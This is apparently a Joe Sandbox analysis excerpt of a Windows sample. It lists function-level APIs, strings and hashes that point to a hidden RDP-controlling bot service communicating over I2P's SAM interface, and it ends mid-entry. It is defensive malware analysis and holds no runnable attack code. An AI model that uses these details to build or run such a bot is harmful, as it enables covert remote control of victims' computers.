OpenSCManagerA.ADVAPI32 ref: 00007FFE0E168B9E
GetLastError.KERNEL32 ref: 00007FFE0E168BE6
GetLastError.KERNEL32 ref: 00007FFE0E168CBE

Part of subcall function 00007FFE0E16C852: fwrite.MSVCRT ref: 00007FFE0E16C8FE
Part of subcall function 00007FFE0E16C852: fflush.MSVCRT ref: 00007FFE0E16C90A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E168BD2
[I] (%s) -> %s, xrefs: 00007FFE0E168CFC
Done, xrefs: 00007FFE0E168CEE
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu), xrefs: 00007FFE0E168BF8
[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu), xrefs: 00007FFE0E168CCE
scm_init, xrefs: 00007FFE0E168BCB, 00007FFE0E168BF1, 00007FFE0E168CC7, 00007FFE0E168CF5
~, xrefs: 00007FFE0E168C64
, xrefs: 00007FFE0E168C04
P, xrefs: 00007FFE0E168C6D
ServicesActive, xrefs: 00007FFE0E168B92

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
API String ID: 546114577-3142219161
Opcode ID: 3bdce6e1a4986cffe8a71d2927b48b3e338f07e2e05f0671271003f466fb1071
Instruction ID: bf5e9abcc08587c8ec2ffa1d6ea585ec08ebf1b6cecc852c406a7af8f22da45d
Opcode Fuzzy Hash: 3bdce6e1a4986cffe8a71d2927b48b3e338f07e2e05f0671271003f466fb1071
Instruction Fuzzy Hash: 094127A0F0CB0792FB688714E8C53B816A1AF18744FA50437CACE462F7DE6DA988C351

Function 00007FFE13383340 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 101memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE1338340C
HeapFree.KERNEL32 ref: 00007FFE1338341D
EnterCriticalSection.KERNEL32 ref: 00007FFE13383441
LeaveCriticalSection.KERNEL32 ref: 00007FFE13383464
EnterCriticalSection.KERNEL32 ref: 00007FFE133834D1
Sleep.KERNEL32 ref: 00007FFE133834F0
EnterCriticalSection.KERNEL32 ref: 00007FFE13383502
GetProcessHeap.KERNEL32 ref: 00007FFE13383520
HeapFree.KERNEL32 ref: 00007FFE13383531
LeaveCriticalSection.KERNEL32 ref: 00007FFE13383540

Strings

, xrefs: 00007FFE13383355
routine_tx, xrefs: 00007FFE133834B7
KCIT, xrefs: 00007FFE1338335D
[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE133834BE
--TSCB--, xrefs: 00007FFE13383374
-VRSTVE-, xrefs: 00007FFE13383365

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 610085118-1825955162
Opcode ID: 843ef7f08b1eddbb2451e73753f8425bc2b5ba87fcf09f84b56d6d1c7b6bada2
Instruction ID: eb3681ad5bd453d3687cc46048373acdb9d2652d738ed0774ebaeaafa2320175
Opcode Fuzzy Hash: 843ef7f08b1eddbb2451e73753f8425bc2b5ba87fcf09f84b56d6d1c7b6bada2
Instruction Fuzzy Hash: DD512A25A09E42CAF6158B17F8402796761EFA4BB0F5401B6DA6E67B74DF3CE9818308

Function 00007FF6EF657166 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF6EF65719A

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

GetLastError.KERNEL32 ref: 00007FF6EF6572F9

Strings

[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF6EF6571D5
(xpath != NULL), xrefs: 00007FF6EF65722D
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF6EF6573DB
(xpath_sz != NULL), xrefs: 00007FF6EF65725D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF657208, 00007FF6EF65723B, 00007FF6EF65726B, 00007FF6EF65729B
(path != NULL), xrefs: 00007FF6EF6571FA
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF6EF65730E
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF6EF6572CD
((*xpath_sz) > 0), xrefs: 00007FF6EF65728D
fs_path_expand, xrefs: 00007FF6EF6571CE, 00007FF6EF657201, 00007FF6EF657234, 00007FF6EF657264, 00007FF6EF657294, 00007FF6EF6572C6, 00007FF6EF657307, 00007FF6EF6573D4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF6571F3, 00007FF6EF657226, 00007FF6EF657256, 00007FF6EF657286

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: 65f318fae4b60edf188fa2be80c067e3a52f136fd7890af5129330c153f06364
Instruction ID: e0699e00c6dbefae65b4895684cd75afc276cfe042cde7a8c629e90d9b5a0977
Opcode Fuzzy Hash: 65f318fae4b60edf188fa2be80c067e3a52f136fd7890af5129330c153f06364
Instruction Fuzzy Hash: 52618463A1C54B87FB204B54E9003B82359BF80744F990932E90DEB592DE7EE985B30F

Function 00007FFE0E166F2B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 132stringtimeCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0E166F93
strlen.MSVCRT ref: 00007FFE0E166FB5
strlen.MSVCRT ref: 00007FFE0E166FC9
strlen.MSVCRT ref: 00007FFE0E16703F
strlen.MSVCRT ref: 00007FFE0E16705B
strlen.MSVCRT ref: 00007FFE0E16706C
CompareFileTime.KERNEL32 ref: 00007FFE0E1670BE

Part of subcall function 00007FFE0E168B2C: EnterCriticalSection.KERNEL32 ref: 00007FFE0E168B37

Strings

termsrv3, xrefs: 00007FFE0E166FD1
TermService, xrefs: 00007FFE0E16711D
v32.ini, xrefs: 00007FFE0E167081
%ProgramFiles%\RDP\, xrefs: 00007FFE0E167021
termsrv3, xrefs: 00007FFE0E167074
v32.ini, xrefs: 00007FFE0E166FDE

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: strlen$CompareCriticalEnterFileSectionTime
String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
API String ID: 3718746087-844192579
Opcode ID: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
Instruction ID: 46635582cd825151c8c770f960af88a670e61997bce69536e25a8ffc247c797e
Opcode Fuzzy Hash: a439a34a7d512bd6fd3b234d8ed286ed2e561cc925bdb431e586c477abbbad98
Instruction Fuzzy Hash: C251D621B0C68382FB219B25A5A03FA56A19F85BC4F480073EACD4B7F7EE6CD9058751

Function 00007FFE13383937 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 85memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FFE1338396E
WaitForSingleObject.KERNEL32 ref: 00007FFE1338399D
GetProcessHeap.KERNEL32 ref: 00007FFE133839B9
HeapFree.KERNEL32 ref: 00007FFE133839CA
EnterCriticalSection.KERNEL32 ref: 00007FFE133839E1
Sleep.KERNEL32 ref: 00007FFE13383A1F
EnterCriticalSection.KERNEL32 ref: 00007FFE13383A2E
WaitForSingleObject.KERNEL32 ref: 00007FFE13383A5A
GetProcessHeap.KERNEL32 ref: 00007FFE13383A76
HeapFree.KERNEL32 ref: 00007FFE13383A87
LeaveCriticalSection.KERNEL32 ref: 00007FFE13383A96

Strings

[I] (%s) -> Client gone(client=0x%llx), xrefs: 00007FFE13383988
routine_gc, xrefs: 00007FFE13383981

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait$Sleep
String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
API String ID: 2654219296-2700516951
Opcode ID: e541061a84d68e4215e0cae13377071a3c265754cb899979e921b507e1948460
Instruction ID: 51d6ef5701fce58ef4520f080e70ac3fe16538c9256d228f1d44257025f18317
Opcode Fuzzy Hash: e541061a84d68e4215e0cae13377071a3c265754cb899979e921b507e1948460
Instruction Fuzzy Hash: 1A410A25A09E46C9EF549F13D8502782261AF68F74F0803F5C93E6A7F5DE3CE4818358

Function 00007FFE126DB501 Relevance: 21.2, APIs: 4, Strings: 10, Instructions: 181stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE126DB594

Part of subcall function 00007FFE126DAB26: strcmp.MSVCRT ref: 00007FFE126DAB6E

strlen.MSVCRT ref: 00007FFE126DB6BA
strcpy.MSVCRT ref: 00007FFE126DB6E1
strcpy.MSVCRT ref: 00007FFE126DB780

Strings

SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s, xrefs: 00007FFE126DB608
STATUS, xrefs: 00007FFE126DB643
TRANSIENT, xrefs: 00007FFE126DB684
RESULT, xrefs: 00007FFE126DB63C, 00007FFE126DB71E
SESSION, xrefs: 00007FFE126DB64A
REPLY, xrefs: 00007FFE126DB725
NAMING LOOKUP NAME=ME, xrefs: 00007FFE126DB6F1
VALUE, xrefs: 00007FFE126DB749
NAMING, xrefs: 00007FFE126DB72C
DESTINATION, xrefs: 00007FFE126DB69C

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: strcpystrlen$strcmp
String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
API String ID: 245486318-5999096
Opcode ID: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
Instruction ID: 256d356b22632069ab50eb9623f58b3479342138014ee72aa66ac9c57a7b4f1f
Opcode Fuzzy Hash: ecee1dfa06a6794c833f964ddf6cc2f8bd8bae02478c0eddb80abcd70ea3367c
Instruction Fuzzy Hash: FF713965E0DE5E83EA209B279D103B92250AF457B4F5443B1DDBD077F9EEBCA8018341

Function 00007FF6EF651B75 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 118registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerA.ADVAPI32 ref: 00007FF6EF651BF2
GetLastError.KERNEL32 ref: 00007FF6EF651C25

Part of subcall function 00007FF6EF652EF2: fwrite.MSVCRT ref: 00007FF6EF652F9E
Part of subcall function 00007FF6EF652EF2: fflush.MSVCRT ref: 00007FF6EF652FAA

Strings

[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu), xrefs: 00007FF6EF651C37
P, xrefs: 00007FF6EF651C88
[I] (%s) -> %s, xrefs: 00007FF6EF651D26, 00007FF6EF651D56
~, xrefs: 00007FF6EF651C7F
Service running, xrefs: 00007FF6EF651D18
RDP-Controller, xrefs: 00007FF6EF651BEB
svc_main, xrefs: 00007FF6EF651C30, 00007FF6EF651D1F, 00007FF6EF651D4F
Service stopping, xrefs: 00007FF6EF651D48
, xrefs: 00007FF6EF651C43

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
API String ID: 3562457520-1478336053
Opcode ID: dd29253f3d904388d58b3e7a2cef3793c1ba75d40d834335f78e58db029eae68
Instruction ID: 859200925f93ac0fd1ded349eb32646b2187355702e340e3ef6423b027c15d20
Opcode Fuzzy Hash: dd29253f3d904388d58b3e7a2cef3793c1ba75d40d834335f78e58db029eae68
Instruction Fuzzy Hash: C7515616E1C607A3FB205B9094A03B823BE9F45754F101A36D50EE66D3EE5FA984B34F

Function 00007FFE126DAFB0 Relevance: 21.1, APIs: 9, Strings: 5, Instructions: 94memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE126DAFF7
HeapReAlloc.KERNEL32 ref: 00007FFE126DB00B
strlen.MSVCRT ref: 00007FFE126DB05D
GetProcessHeap.KERNEL32 ref: 00007FFE126DB080
HeapFree.KERNEL32 ref: 00007FFE126DB091
GetProcessHeap.KERNEL32 ref: 00007FFE126DB0A5
HeapAlloc.KERNEL32 ref: 00007FFE126DB0B6

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

GetProcessHeap.KERNEL32 ref: 00007FFE126DB0F8
HeapFree.KERNEL32 ref: 00007FFE126DB109

Strings

mem_alloc, xrefs: 00007FFE126DB0C8
sam3_send_req, xrefs: 00007FFE126DB047
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE126DB0CF, 00007FFE126DB0E7
[D] (%s) -> %s, xrefs: 00007FFE126DB04E
mem_realloc, xrefs: 00007FFE126DB0E0

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: Heap$Process$AllocFree$fflushfwritestrlen
String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
API String ID: 1135201459-1870638116
Opcode ID: d9a8ec916b7675763b8e0852a7eaaf342cbe35f40ecd2bcee3c7ee19bebd52f9
Instruction ID: 309d18a9d04cbe1f4ea2cbc6265825d9059d312cd70f918bd249a7bd30f3d454
Opcode Fuzzy Hash: d9a8ec916b7675763b8e0852a7eaaf342cbe35f40ecd2bcee3c7ee19bebd52f9
Instruction Fuzzy Hash: 91318D51A0AE8E86FE509B17EC547F96350BF94BE0F5840B4D98D463F9EEACE5048740

Function 00007FFE0E13D030 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 105memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE0E13D0CE
GetProcessHeap.KERNEL32 ref: 00007FFE0E13D101
HeapAlloc.KERNEL32 ref: 00007FFE0E13D112
strcpy.MSVCRT ref: 00007FFE0E13D16B
GetProcessHeap.KERNEL32 ref: 00007FFE0E13D181
HeapFree.KERNEL32 ref: 00007FFE0E13D192

Strings

-LTCMAS-, xrefs: 00007FFE0E13D122
[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx), xrefs: 00007FFE0E13D0F2
on_tick_expiry, xrefs: 00007FFE0E13D0EB
mem_alloc, xrefs: 00007FFE0E13D1A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E13D1A7
-LTCSES-, xrefs: 00007FFE0E13D130
XESS, xrefs: 00007FFE0E13D13E

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: Heap$Process$AllocFreestrcpystrlen
String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
API String ID: 925994320-1558387473
Opcode ID: ff4aa0e7a8c90f478eecc01f71bf0da391492fff23dc6814b9622291a2ad2d71
Instruction ID: d87c4d601074a3592524eddd590a8ad5158b29c86b72773038263cfd86b2a6d1
Opcode Fuzzy Hash: ff4aa0e7a8c90f478eecc01f71bf0da391492fff23dc6814b9622291a2ad2d71
Instruction Fuzzy Hash: CA419FA1A09B4685EA44AF25E8443BD77A1FF84B84F440436EE9E073F6DE7CE845C310

Function 00007FF6EF656FD3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6EF656FFE
strlen.MSVCRT ref: 00007FF6EF657027
strlen.MSVCRT ref: 00007FF6EF657033
strlen.MSVCRT ref: 00007FF6EF657049

Strings

[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF6EF65705E
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FF6EF65712B
NULL, xrefs: 00007FF6EF65715D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF657091, 00007FF6EF6570C1, 00007FF6EF6570F1
(path != NULL), xrefs: 00007FF6EF657083
fs_path_temp, xrefs: 00007FF6EF657057, 00007FF6EF65708A, 00007FF6EF6570BA, 00007FF6EF6570EA, 00007FF6EF657124
((*path_sz) > 0), xrefs: 00007FF6EF6570E3
(path_sz != NULL), xrefs: 00007FF6EF6570B3
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF65707C, 00007FF6EF6570AC, 00007FF6EF6570DC

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3302659514
Opcode ID: 7b861545304d1f514fcde138a12ecea94f5104ea430eaf2499474c994248ce49
Instruction ID: 68de696d32e432520cb50128b6f5b2ef8b0c9cc4273b12e9ebb9bd6698170281
Opcode Fuzzy Hash: 7b861545304d1f514fcde138a12ecea94f5104ea430eaf2499474c994248ce49
Instruction Fuzzy Hash: 6941A563A1C64783FF218F54E8103B51359BF50788F894932E54EEB696DF3E9506E30A

Function 00007FFE13382C99 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FFE13382D44
accept.WS2_32 ref: 00007FFE13382D6B
htonl.WS2_32 ref: 00007FFE13382D9B
htons.WS2_32 ref: 00007FFE13382DAC

Part of subcall function 00007FFE133826B9: ioctlsocket.WS2_32 ref: 00007FFE133826DF

WSAGetLastError.WS2_32 ref: 00007FFE13382E5E
WSAGetLastError.WS2_32 ref: 00007FFE13382E9A

Strings

[E] (%s) -> Failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13382EAD
[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u), xrefs: 00007FFE13382DF5
[W] (%s) -> select timedout(sock=0x%llx), xrefs: 00007FFE13382E3E
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE13382E71
tcp_accept, xrefs: 00007FFE13382DEE, 00007FFE13382E37, 00007FFE13382E6A, 00007FFE13382EA6

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
API String ID: 2278979430-4175654481
Opcode ID: 3b89421958d52078f8a9eb330a66aaaf8ef7693b0d34dd29c2a1c9dbed56fd08
Instruction ID: b6b933031a4ab3751aafd369fe97d46078800be1985e0491988af5be9fbd681c
Opcode Fuzzy Hash: 3b89421958d52078f8a9eb330a66aaaf8ef7693b0d34dd29c2a1c9dbed56fd08
Instruction Fuzzy Hash: 9151D432A08E428DE7608F16E4403BD6661AF64BB4F5403B1D97DA7AF4DF3DA4858748

Function 00007FFE11EC1E00 Relevance: 18.1, APIs: 1, Strings: 11, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE11EC1EEC

Strings

NULL, xrefs: 00007FFE11EC1F7E, 00007FFE11EC1F87
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE11EC1F1D
